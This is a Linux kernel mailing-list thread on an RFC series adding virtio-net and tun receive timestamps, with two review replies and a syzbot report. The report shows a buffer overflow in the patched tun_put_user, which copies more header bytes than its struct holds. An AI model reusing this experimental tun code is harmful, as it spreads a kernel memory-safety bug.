source
large_stringclasses
2 values
subject
large_stringclasses
112 values
code
large_stringclasses
112 values
critique
large_stringlengths
61
3.04M
metadata
dict
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Demonstrate support for new virtio-net features VIRTIO_NET_HDR_F_TSTAMP This is not intended to be merged. A full feature test also requires a patched qemu binary that knows these features and negotiates correct vnet_hdr_sz in virtio_net_set_mrg_rx_bufs. See https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Not-yet-signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- drivers/net/tun.c | 30 ++++++++++++++++++------------ 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/drivers/net/tun.c b/drivers/net/tun.c index 8192740357a09..aa988a9c4bc99 100644 --- a/drivers/net/tun.c +++ b/drivers/net/tun.c @@ -2065,23 +2065,29 @@ static ssize_t tun_put_user(struct tun_struct *tun, } if (vnet_hdr_sz) { - struct virtio_net_hdr_v1_hash_tunnel hdr; - struct virtio_net_hdr *gso; + struct virtio_net_hdr_v1_hash_tunnel_ts hdr; + + memset(&hdr, 0, sizeof(hdr)); ret = tun_vnet_hdr_tnl_from_skb(tun->flags, tun->dev, skb, - &hdr); + (struct virtio_net_hdr_v1_hash_tunnel *)&hdr); if (ret) return ret; - /* - * Drop the packet if the configured header size is too small - * WRT the enabled offloads. - */ - gso = (struct virtio_net_hdr *)&hdr; - ret = __tun_vnet_hdr_put(vnet_hdr_sz, tun->dev->features, - iter, gso); - if (ret) - return ret; + if (vnet_hdr_sz >= sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts)) { + __le64 tstamp = cpu_to_le64(ktime_get_ns()); + + hdr.tstamp_0 = (tstamp & 0x000000000000ffffULL) >> 0; + hdr.tstamp_1 = (tstamp & 0x00000000ffff0000ULL) >> 16; + hdr.tstamp_2 = (tstamp & 0x0000ffff00000000ULL) >> 32; + hdr.tstamp_3 = (tstamp & 0xffff000000000000ULL) >> 48; + } + + if (unlikely(iov_iter_count(iter) < vnet_hdr_sz)) + return -EINVAL; + + if (unlikely(copy_to_iter(&hdr, vnet_hdr_sz, iter) != vnet_hdr_sz)) + return -EFAULT; } if (vlan_hlen) { -- 2.52.0
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 09:06:41 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Add optional hardware rx timestamp offload for virtio-net. Introduce virtio feature VIRTIO_NET_F_TSTAMP. If negotiated, the virtio-net header is expanded with room for a timestamp. To get and set the hwtstamp the functions ndo_hwtstamp_set/get need to be implemented. This allows filtering the packets and only time stamp the packets where the filter matches. This way, the timestamping can be en/disabled at runtime. Tested: guest: ./timestamping eth0 \ SOF_TIMESTAMPING_RAW_HARDWARE \ SOF_TIMESTAMPING_RX_HARDWARE host: nc -4 -u 192.168.1.1 319 Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> -- Changes to last version: - rework series to use flow filters - add new struct virtio_net_hdr_v1_hash_tunnel_ts - original work done by: Willem de Bruijn <willemb@google.com> --- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 2 files changed, 133 insertions(+), 12 deletions(-) diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c index 1bb3aeca66c6e..4e8d9b20c1b34 100644 --- a/drivers/net/virtio_net.c +++ b/drivers/net/virtio_net.c @@ -429,6 +429,9 @@ struct virtnet_info { struct virtio_net_rss_config_trailer rss_trailer; u8 rss_hash_key_data[VIRTIO_NET_RSS_MAX_KEY_SIZE]; + /* Device passes time stamps from the driver */ + bool has_tstamp; + /* Has control virtqueue */ bool has_cvq; @@ -475,6 +478,8 @@ struct virtnet_info { struct control_buf *ctrl; + struct kernel_hwtstamp_config tstamp_config; + /* Ethtool settings */ u8 duplex; u32 speed; @@ -511,6 +516,7 @@ struct virtio_net_common_hdr { struct virtio_net_hdr_mrg_rxbuf mrg_hdr; struct virtio_net_hdr_v1_hash hash_v1_hdr; struct virtio_net_hdr_v1_hash_tunnel tnl_hdr; + struct virtio_net_hdr_v1_hash_tunnel_ts ts_hdr; }; }; @@ -682,6 +688,13 @@ skb_vnet_common_hdr(struct sk_buff *skb) return (struct virtio_net_common_hdr *)skb->cb; } +static inline struct virtio_net_hdr_v1_hash_tunnel_ts *skb_vnet_hdr_ts(struct sk_buff *skb) +{ + BUILD_BUG_ON(sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts) > sizeof(skb->cb)); + + return (void *)skb->cb; +} + /* * private is used to chain pages for big packets, put the whole * most recent used list in the beginning for reuse @@ -2560,6 +2573,15 @@ virtio_net_hash_value(const struct virtio_net_hdr_v1_hash *hdr_hash) (__le16_to_cpu(hdr_hash->hash_value_hi) << 16); } +static inline u64 +virtio_net_tstamp_value(const struct virtio_net_hdr_v1_hash_tunnel_ts *hdr_hash_ts) +{ + return (u64)__le16_to_cpu(hdr_hash_ts->tstamp_0) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_1) << 16) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_2) << 32) | + ((u64)__le16_to_cpu(hdr_hash_ts->tstamp_3) << 48); +} + static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash, struct sk_buff *skb) { @@ -2589,6 +2611,18 @@ static void virtio_skb_set_hash(const struct virtio_net_hdr_v1_hash *hdr_hash, skb_set_hash(skb, virtio_net_hash_value(hdr_hash), rss_hash_type); } +static inline void virtnet_record_rx_tstamp(const struct virtnet_info *vi, + struct sk_buff *skb) +{ + struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb); + const struct virtio_net_hdr_v1_hash_tunnel_ts *h = skb_vnet_hdr_ts(skb); + u64 ts; + + ts = virtio_net_tstamp_value(h); + memset(shhwtstamps, 0, sizeof(struct skb_shared_hwtstamps)); + shhwtstamps->hwtstamp = ns_to_ktime(ts); +} + static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue *rq, struct sk_buff *skb, u8 flags) { @@ -2617,6 +2651,8 @@ static void virtnet_receive_done(struct virtnet_info *vi, struct receive_queue * goto frame_err; } + if (vi->has_tstamp && vi->tstamp_config.rx_filter != HWTSTAMP_FILTER_NONE) + virtnet_record_rx_tstamp(vi, skb); skb_record_rx_queue(skb, vq2rxq(rq->vq)); skb->protocol = eth_type_trans(skb, dev); pr_debug("Receiving skb proto 0x%04x len %i type %i\n", @@ -3321,7 +3357,7 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) { const unsigned char *dest = ((struct ethhdr *)skb->data)->h_dest; struct virtnet_info *vi = sq->vq->vdev->priv; - struct virtio_net_hdr_v1_hash_tunnel *hdr; + struct virtio_net_hdr_v1_hash_tunnel_ts *hdr; int num_sg; unsigned hdr_len = vi->hdr_len; bool can_push; @@ -3329,8 +3365,8 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) pr_debug("%s: xmit %p %pM\n", vi->dev->name, skb, dest); /* Make sure it's safe to cast between formats */ - BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr)); - BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->hash_hdr.hdr)); + BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr)); + BUILD_BUG_ON(__alignof__(*hdr) != __alignof__(hdr->tnl.hash_hdr.hdr)); can_push = vi->any_header_sg && !((unsigned long)skb->data & (__alignof__(*hdr) - 1)) && @@ -3338,18 +3374,18 @@ static int xmit_skb(struct send_queue *sq, struct sk_buff *skb, bool orphan) /* Even if we can, don't push here yet as this would skew * csum_start offset below. */ if (can_push) - hdr = (struct virtio_net_hdr_v1_hash_tunnel *)(skb->data - - hdr_len); + hdr = (struct virtio_net_hdr_v1_hash_tunnel_ts *)(skb->data - + hdr_len); else - hdr = &skb_vnet_common_hdr(skb)->tnl_hdr; + hdr = &skb_vnet_common_hdr(skb)->ts_hdr; - if (virtio_net_hdr_tnl_from_skb(skb, hdr, vi->tx_tnl, + if (virtio_net_hdr_tnl_from_skb(skb, &hdr->tnl, vi->tx_tnl, virtio_is_little_endian(vi->vdev), 0, false)) return -EPROTO; if (vi->mergeable_rx_bufs) - hdr->hash_hdr.hdr.num_buffers = 0; + hdr->tnl.hash_hdr.hdr.num_buffers = 0; sg_init_table(sq->sg, skb_shinfo(skb)->nr_frags + (can_push ? 1 : 2)); if (can_push) { @@ -5563,6 +5599,22 @@ static int virtnet_get_per_queue_coalesce(struct net_device *dev, return 0; } +static int virtnet_get_ts_info(struct net_device *dev, + struct kernel_ethtool_ts_info *info) +{ + /* setup default software timestamp */ + ethtool_op_get_ts_info(dev, info); + + info->rx_filters = (BIT(HWTSTAMP_FILTER_NONE) | + BIT(HWTSTAMP_FILTER_PTP_V1_L4_SYNC) | + BIT(HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ) | + BIT(HWTSTAMP_FILTER_ALL)); + + info->tx_types = HWTSTAMP_TX_OFF; + + return 0; +} + static void virtnet_init_settings(struct net_device *dev) { struct virtnet_info *vi = netdev_priv(dev); @@ -5658,7 +5710,7 @@ static const struct ethtool_ops virtnet_ethtool_ops = { .get_ethtool_stats = virtnet_get_ethtool_stats, .set_channels = virtnet_set_channels, .get_channels = virtnet_get_channels, - .get_ts_info = ethtool_op_get_ts_info, + .get_ts_info = virtnet_get_ts_info, .get_link_ksettings = virtnet_get_link_ksettings, .set_link_ksettings = virtnet_set_link_ksettings, .set_coalesce = virtnet_set_coalesce, @@ -6242,6 +6294,58 @@ static void virtnet_tx_timeout(struct net_device *dev, unsigned int txqueue) jiffies_to_usecs(jiffies - READ_ONCE(txq->trans_start))); } +static int virtnet_hwtstamp_get(struct net_device *dev, + struct kernel_hwtstamp_config *tstamp_config) +{ + struct virtnet_info *vi = netdev_priv(dev); + + if (!netif_running(dev)) + return -EINVAL; + + *tstamp_config = vi->tstamp_config; + + return 0; +} + +static int virtnet_hwtstamp_set(struct net_device *dev, + struct kernel_hwtstamp_config *tstamp_config, + struct netlink_ext_ack *extack) +{ + struct virtnet_info *vi = netdev_priv(dev); + + if (!netif_running(dev)) + return -EINVAL; + + switch (tstamp_config->rx_filter) { + case HWTSTAMP_FILTER_PTP_V1_L4_SYNC: + case HWTSTAMP_FILTER_PTP_V1_L4_DELAY_REQ: + break; + case HWTSTAMP_FILTER_PTP_V2_EVENT: + case HWTSTAMP_FILTER_PTP_V2_L2_EVENT: + case HWTSTAMP_FILTER_PTP_V2_L4_EVENT: + case HWTSTAMP_FILTER_PTP_V2_SYNC: + case HWTSTAMP_FILTER_PTP_V2_L2_SYNC: + case HWTSTAMP_FILTER_PTP_V2_L4_SYNC: + case HWTSTAMP_FILTER_PTP_V2_DELAY_REQ: + case HWTSTAMP_FILTER_PTP_V2_L2_DELAY_REQ: + case HWTSTAMP_FILTER_PTP_V2_L4_DELAY_REQ: + tstamp_config->rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT; + break; + case HWTSTAMP_FILTER_NONE: + break; + case HWTSTAMP_FILTER_ALL: + tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL; + break; + default: + tstamp_config->rx_filter = HWTSTAMP_FILTER_ALL; + return -ERANGE; + } + + vi->tstamp_config = *tstamp_config; + + return 0; +} + static int virtnet_init_irq_moder(struct virtnet_info *vi) { u8 profile_flags = 0, coal_flags = 0; @@ -6289,6 +6393,8 @@ static const struct net_device_ops virtnet_netdev = { .ndo_get_phys_port_name = virtnet_get_phys_port_name, .ndo_set_features = virtnet_set_features, .ndo_tx_timeout = virtnet_tx_timeout, + .ndo_hwtstamp_set = virtnet_hwtstamp_set, + .ndo_hwtstamp_get = virtnet_hwtstamp_get, }; static void virtnet_config_changed_work(struct work_struct *work) @@ -6911,6 +7017,9 @@ static int virtnet_probe(struct virtio_device *vdev) if (virtio_has_feature(vdev, VIRTIO_NET_F_HASH_REPORT)) vi->has_rss_hash_report = true; + if (virtio_has_feature(vdev, VIRTIO_NET_F_TSTAMP)) + vi->has_tstamp = true; + if (virtio_has_feature(vdev, VIRTIO_NET_F_RSS)) { vi->has_rss = true; @@ -6945,8 +7054,10 @@ static int virtnet_probe(struct virtio_device *vdev) dev->xdp_metadata_ops = &virtnet_xdp_metadata_ops; } - if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) || - virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO)) + if (vi->has_tstamp) + vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel_ts); + else if (virtio_has_feature(vdev, VIRTIO_NET_F_GUEST_UDP_TUNNEL_GSO) || + virtio_has_feature(vdev, VIRTIO_NET_F_HOST_UDP_TUNNEL_GSO)) vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash_tunnel); else if (vi->has_rss_hash_report) vi->hdr_len = sizeof(struct virtio_net_hdr_v1_hash); @@ -7269,7 +7380,8 @@ static struct virtio_device_id id_table[] = { VIRTIO_NET_F_SPEED_DUPLEX, VIRTIO_NET_F_STANDBY, \ VIRTIO_NET_F_RSS, VIRTIO_NET_F_HASH_REPORT, VIRTIO_NET_F_NOTF_COAL, \ VIRTIO_NET_F_VQ_NOTF_COAL, \ - VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS + VIRTIO_NET_F_GUEST_HDRLEN, VIRTIO_NET_F_DEVICE_STATS, \ + VIRTIO_NET_F_TSTAMP static unsigned int features[] = { VIRTNET_FEATURES, diff --git a/include/uapi/linux/virtio_net.h b/include/uapi/linux/virtio_net.h index 1db45b01532b5..9f967575956b8 100644 --- a/include/uapi/linux/virtio_net.h +++ b/include/uapi/linux/virtio_net.h @@ -56,6 +56,7 @@ #define VIRTIO_NET_F_MQ 22 /* Device supports Receive Flow * Steering */ #define VIRTIO_NET_F_CTRL_MAC_ADDR 23 /* Set MAC address */ +#define VIRTIO_NET_F_TSTAMP 49 /* Device sends TAI receive time */ #define VIRTIO_NET_F_DEVICE_STATS 50 /* Device can provide device-level statistics. */ #define VIRTIO_NET_F_VQ_NOTF_COAL 52 /* Device supports virtqueue notification coalescing */ #define VIRTIO_NET_F_NOTF_COAL 53 /* Device supports notifications coalescing */ @@ -215,6 +216,14 @@ struct virtio_net_hdr_v1_hash_tunnel { __le16 inner_nh_offset; }; +struct virtio_net_hdr_v1_hash_tunnel_ts { + struct virtio_net_hdr_v1_hash_tunnel tnl; + __le16 tstamp_0; + __le16 tstamp_1; + __le16 tstamp_2; + __le16 tstamp_3; +}; + #ifndef VIRTIO_NET_NO_LEGACY /* This header comes first in the scatter-gather list. * For legacy virtio, if VIRTIO_F_ANY_LAYOUT is not negotiated, it must -- 2.52.0
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 09:06:42 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On Thu, 29 Jan 2026 09:06:42 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote: Since patch #1 used this struct, this one should be placed first in the series. Also, has the virtio specification process accepted such a draft proposal? Thanks
{ "author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>", "date": "Thu, 29 Jan 2026 17:48:25 +0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
Hi, On 2026-01-29 at 17:48 +08, Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote: oh, you are right, the order should be the other way around. I haven't sent the draft yet, because I'm unsure if I understood the way this should be implemented with the flow filter correctly. If the direction is correct, I'd try and get the specification process going again. (That is not that easy, if you're not used to it and not that deep into the whole virtio universe ;)) Best regards, Steffen -- Pengutronix e.K. | Dipl.-Inform. Steffen Trumtrar | Steuerwalder Str. 21 | https://www.pengutronix.de/ | 31137 Hildesheim, Germany | Phone: +49-5121-206917-0 | Amtsgericht Hildesheim, HRA 2686| Fax: +49-5121-206917-5555 |
{ "author": "Steffen Trumtrar <s.trumtrar@pengutronix.de>", "date": "Thu, 29 Jan 2026 11:08:27 +0100", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
On Thu, 29 Jan 2026 11:08:27 +0100, Steffen Trumtrar <s.trumtrar@pengutronix.de> wrote: There have been many historical attempts in this area- you may want to take a look first. Thanks.
{ "author": "Xuan Zhuo <xuanzhuo@linux.alibaba.com>", "date": "Thu, 29 Jan 2026 19:03:15 +0800", "thread_id": "20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de.mbox.gz" }
lkml
[PATCH RFC v2 0/2] virtio-net: add flow filter for receive timestamps
This series tries to pick up the work on the virtio-net timestamping feature from Willem de Bruijn. Original series Message-Id: 20210208185558.995292-1-willemdebruijn.kernel@gmail.com Subject: [PATCH RFC v2 0/4] virtio-net: add tx-hash, rx-tstamp, tx-tstamp and tx-time From: Willem de Bruijn <willemb@google.com> RFC for four new features to the virtio network device: 1. pass tx flow state to host, for routing + telemetry 2. pass rx tstamp to guest, for better RTT estimation 3. pass tx tstamp to guest, idem 3. pass tx delivery time to host, for accurate pacing All would introduce an extension to the virtio spec. The changes in this series are to the driver side. For the changes to qemu see: https://github.com/strumtrar/qemu/tree/v10.2.0/virtio-rx-stamps Currently only virtio-net is supported. Performance was tested with pktgen which doesn't show a decrease in transfer speeds. As these patches are now mostly different from the initial patchset, I removed the Signed-off-bys from Willem, so he mustn't be ashamed of what his work evolved to ;) Signed-off-by: Steffen Trumtrar <s.trumtrar@pengutronix.de> --- Changes in v2: - rework patches to use flow filter instead of feature flag - Link to v1: https://lore.kernel.org/r/20231218-v6-7-topic-virtio-net-ptp-v1-0-cac92b2d8532@pengutronix.de --- Steffen Trumtrar (2): tun: support rx-tstamp virtio-net: support receive timestamp drivers/net/tun.c | 30 +++++---- drivers/net/virtio_net.c | 136 ++++++++++++++++++++++++++++++++++++---- include/uapi/linux/virtio_net.h | 9 +++ 3 files changed, 151 insertions(+), 24 deletions(-) --- base-commit: 8f0b4cce4481fb22653697cced8d0d04027cb1e8 change-id: 20231218-v6-7-topic-virtio-net-ptp-3df023bc4f4d Best regards, -- Steffen Trumtrar <s.trumtrar@pengutronix.de>
syzbot ci has tested the following series [v2] virtio-net: add flow filter for receive timestamps https://lore.kernel.org/all/20260129-v6-7-topic-virtio-net-ptp-v2-0-30a27dc52760@pengutronix.de * [PATCH RFC v2 1/2] tun: support rx-tstamp * [PATCH RFC v2 2/2] virtio-net: support receive timestamp and found the following issue: WARNING in __copy_overflow Full report is available here: https://ci.syzbot.org/series/0b35c8c9-603b-4126-ac04-0095faadb2f5 *** WARNING in __copy_overflow tree: net-next URL: https://kernel.googlesource.com/pub/scm/linux/kernel/git/netdev/net-next.git base: ffeafa65b2b26df2f5b5a6118d3174f17bd12ec5 arch: amd64 compiler: Debian clang version 21.1.8 (++20251221033036+2078da43e25a-1~exp1~20251221153213.50), Debian LLD 21.1.8 config: https://ci.syzbot.org/builds/d8316da2-2688-4d74-bbf4-e8412e24d106/config C repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/c_repro syz repro: https://ci.syzbot.org/findings/96af937a-787b-4fd5-baef-529fc80e0bb7/syz_repro ------------[ cut here ]------------ Buffer overflow detected (32 < 1840)! WARNING: mm/maccess.c:234 at __copy_overflow+0x17/0x30 mm/maccess.c:234, CPU#0: syz.0.17/5993 Modules linked in: CPU: 0 UID: 0 PID: 5993 Comm: syz.0.17 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.2-debian-1.16.2-1 04/01/2014 RIP: 0010:__copy_overflow+0x1c/0x30 mm/maccess.c:234 Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 55 53 48 89 f3 89 fd e8 60 b1 c4 ff 48 8d 3d 39 25 d5 0d 89 ee 48 89 da <67> 48 0f b9 3a 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 90 90 RSP: 0018:ffffc90003b97888 EFLAGS: 00010293 RAX: ffffffff81fdcf50 RBX: 0000000000000730 RCX: ffff88810ccd9d40 RDX: 0000000000000730 RSI: 0000000000000020 RDI: ffffffff8fd2f490 RBP: 0000000000000020 R08: ffffffff8fcec777 R09: 1ffffffff1f9d8ee R10: dffffc0000000000 R11: ffffffff81742230 R12: dffffc0000000000 R13: 0000000000000000 R14: 0000000000000730 R15: 1ffff92000772f30 FS: 00007f08c446a6c0(0000) GS:ffff88818e32d000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f08c4448ff8 CR3: 000000010cec2000 CR4: 00000000000006f0 Call Trace: <TASK> copy_overflow include/linux/ucopysize.h:41 [inline] check_copy_size include/linux/ucopysize.h:50 [inline] copy_to_iter include/linux/uio.h:219 [inline] tun_put_user drivers/net/tun.c:2089 [inline] tun_do_read+0x1f44/0x28a0 drivers/net/tun.c:2190 tun_chr_read_iter+0x13b/0x260 drivers/net/tun.c:2214 do_iter_readv_writev+0x619/0x8c0 fs/read_write.c:-1 vfs_readv+0x288/0x840 fs/read_write.c:1018 do_readv+0x154/0x2e0 fs/read_write.c:1080 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] 